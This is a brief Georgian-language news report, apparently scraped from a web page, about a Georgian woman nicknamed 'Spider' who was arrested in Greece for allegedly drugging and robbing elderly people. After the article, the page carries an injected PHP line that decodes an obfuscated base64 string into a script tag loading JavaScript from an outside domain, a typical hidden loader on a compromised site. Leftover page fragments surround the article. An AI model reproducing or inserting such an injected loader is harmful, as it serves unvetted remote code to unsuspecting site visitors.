celsiusi
ავერსი საქკაბელი
საბერძნეთს 48 წლის ქართველი ქალი  მეტსახელად "ობობა" დააკავეს. მას ყაჩაღობისა და ქურდობის 13 საქმეზე ედება ბრალი - ამის შესახებ ინფორმაციას ბერძნული მედია ავრცელებს
 
გამოცემის თანახმად, ქალმა ბერძენ მოხუცებს საძილე აბები, კერძოდ, ნარკოტიკული ნივთიერებები, მისცა და შემდეგ ძარცვავდა, სწორედ ამ დროს კი  სამართალდამცველებმა ის დააკავეს. 
 
საბერძნეთის პროკურატურის ცნობით,  ბრალდებულის მონმონაწილეობით, ამ დროისთვის უკვე გახსნილია ყაჩაღობის 9 და ქურდობის 4 საქმე. უწყება მის ფოტოსურათებს აქვეყნებს და მოქალაქეებს სიფრთხილისკენ მოუწოდებს. 
 
1974 წელს დაბადებული ქართველი ქალი მეტსახელად "ობობა" 26 ივნისს დააკავეს. 
 
 
 
2166
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");